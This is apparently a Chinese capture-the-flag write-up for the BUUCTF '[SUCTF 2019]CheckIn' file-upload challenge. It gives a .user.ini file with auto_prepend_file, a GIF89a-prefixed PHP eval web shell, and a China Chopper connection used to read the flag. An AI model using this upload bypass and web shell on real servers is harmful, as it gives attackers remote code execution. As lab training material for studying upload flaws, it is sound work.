BUU-WEB-[SUCTF 2019]CheckIn
BUU-WEB-[SUCTF 2019]CheckIn
![BUU-WEB-[SUCTF 2019]CheckIn_第1张图片](http://img.e-com-net.com/image/info8/5380fc9529e341e9b2c71633b441a971.jpg)
看样子就知道又是一道文件上传题,但是没告诉我们可以上传什么文件。于是先尝试一个随便的txt文件。(传一句话木马会被拒)
![BUU-WEB-[SUCTF 2019]CheckIn_第2张图片](http://img.e-com-net.com/image/info8/84c78b05c2ae4f74b7c79ba184d9b786.jpg)
告诉我们要上传图片格式。
根据exif_imagetype函数,首先要上传**.user.ini**文件
文件内容为:
GIF89a
auto_prepend_file=01.jpg
![BUU-WEB-[SUCTF 2019]CheckIn_第3张图片](http://img.e-com-net.com/image/info8/e15f324ad1ed453d9af14bcdf44d9dc7.jpg)
一句话木马如下:
GIF89a
<script language="php">eval($_POST[shell])</script>
![BUU-WEB-[SUCTF 2019]CheckIn_第4张图片](http://img.e-com-net.com/image/info8/e319772f4d624f558dce8d1764f1d94e.jpg)
然后菜刀访问:
http://a28dd4c5-81f9-4c65-a695-4d5b11083e1d.node3.buuoj.cn/uploads/d99081fe929b750e0557f85e6499103f/index.php
即可连接上去获得flag。
![BUU-WEB-[SUCTF 2019]CheckIn_第5张图片](http://img.e-com-net.com/image/info8/0cfdd8e030be422e93bb6c8f3e3e9ac3.jpg)